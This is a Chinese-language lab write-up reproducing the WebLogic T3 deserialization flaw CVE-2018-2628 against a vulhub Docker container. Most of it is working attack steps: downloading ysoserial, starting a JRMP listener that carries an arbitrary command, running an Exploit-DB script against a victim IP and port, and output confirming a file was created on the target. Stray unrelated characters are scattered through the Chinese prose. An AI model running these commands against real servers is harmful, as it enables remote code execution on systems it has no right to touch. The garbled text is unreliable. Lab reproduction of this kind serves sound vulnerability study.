此漏洞產(chǎn)生于Weblogic T3服務(wù),當(dāng)開放Weblogic控制臺(tái)端口(默認(rèn)為7001端口)時(shí)刺覆,T3服務(wù)會(huì)默認(rèn)開啟严肪,因此會(huì)造成較大影響。
漏洞編號(hào):
CVE-2018-2628
影響范圍:
> Oracle WebLogic Server10.3.6.0
>
> Oracle WebLogic Server12.2.1.2
>
> Oracle WebLogic Server12.2.1.3
>
> Oracle WebLogic Server12.1.3.0
漏洞原理:
http://www.freebuf.com/vuls/169420.html
https://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
使用Nmap探測(cè)目標(biāo)T3協(xié)議信息
漏洞復(fù)現(xiàn):
1谦屑、首先需要下載一個(gè)國(guó)外大佬寫的一款工具ysoserial(http://www.vuln.cn/6295驳糯,這里有針對(duì)這款工具的分析)。
wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
2氢橙、使用ysoserial啟動(dòng)一個(gè)JRMP Server
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
【listen port】是JRMP Server 監(jiān)聽的端口
【Command】是想要執(zhí)行命令
3酝枢、使用exp向目標(biāo)發(fā)送數(shù)據(jù)包。(腳本鏈接:https://www.exploit-db.com/exploits/44553/)
zksmile@xxx:~$ python CVE-2018-2628.py
Usage:
exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
[victim ip] :目標(biāo)IP
[victim port] : 目標(biāo)端口
[path to ysoserial] : ysoserial的路徑
[JRMPListener ip] : 步驟2中 攻擊機(jī)器的IP
[JRMPClient] :使用的是JRMPClient類
zksmile@xxx:~$ python CVE-2018-2628.py 172.18.0.2 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 172.18.0.1 1099 JRMPClient
4悍手、進(jìn)入docker 容器中帘睦,文件已經(jīng)創(chuàng)建成功袍患。
zksmile@xxx:~/vulhub/weblogic/CVE-2018-2628$ sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
9989f9948b12 vulhub/weblogic "startWebLogic.sh" 7 hours ago Up 7 hours 5556/tcp, 0.0.0.0:7001->7001/tcp cve-2018-2628_weblogic_1
zksmile@xxx:~/vulhub/weblogic/CVE-2018-2628$ sudo docker exec -ti 9989f9948b12 /bin/bash
root@9989f9948b12:~/Oracle/Middleware# ls /tmp/
bea1061393648233859820.tmp hsperfdata_root wlstTemproot
cookie.txt packages zksmile.txt
root@9989f9948b12:~/Oracle/Middleware#
